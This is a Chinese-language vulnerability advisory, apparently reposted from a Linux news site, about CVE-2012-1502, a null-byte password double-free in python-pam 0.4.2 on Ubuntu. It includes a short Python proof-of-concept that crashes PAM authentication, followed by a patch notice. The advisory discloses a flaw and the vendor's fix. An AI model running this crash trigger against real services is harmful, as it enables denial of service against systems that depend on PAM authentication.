发布日期:2012-03-08
更新日期:2012-03-13受影响系统:
Ubuntu Linux 11.x
Ubuntu Linux 10.x
Ubuntu PyPAM
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52370
CVE ID: CVE-2012-1502python-pam是Python到PAM库的接口。PyPAM在验证包含空字节密码的实现上存在拒绝访问漏洞,攻击者可利用此漏洞造成应用崩溃。<*来源:Markus Vervier
链接:http://www.lsexperts.de/advisories/lse-2012-03-01.txt
http://www.linuxidc.com/Linux/2012-03/56585.htm
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Markus Vervier ()提供了如下测试方法:#!/usr/bin/env python
##
## python-pam 0.4.2 double free PoC
##
## 2012 Leading Security Experts GmbH
## Markus Vervier
##
# -*- coding: utf-8 -*-def verify_password(user, password):
import PAM
def pam_conv(auth, query_list, userData):
resp = []
resp.append( (password, 0))
return resp
res = -3
service = "passwd" auth = PAM.pam()
auth.start(service)
auth.set_item(PAM.PAM_USER, user)
auth.set_item(PAM.PAM_CONV, pam_conv)
try:
auth.authenticate()
auth.acct_mgmt()
except PAM.error, resp:
print "Go away! (%s)" % resp
res = -1
except:
print "Internal error"
res = -2
else:
print "Good to go!"
res = 0 return resprint verify_password("root", "ax00secret")建议:
--------------------------------------------------------------------------------
厂商补丁:Ubuntu
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.ubuntulinux.org/TP-LINK TL-WR740N "ping_addr"参数HTML代码注入漏洞Apple Safari多个安全漏洞相关资讯 PyPAM 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
|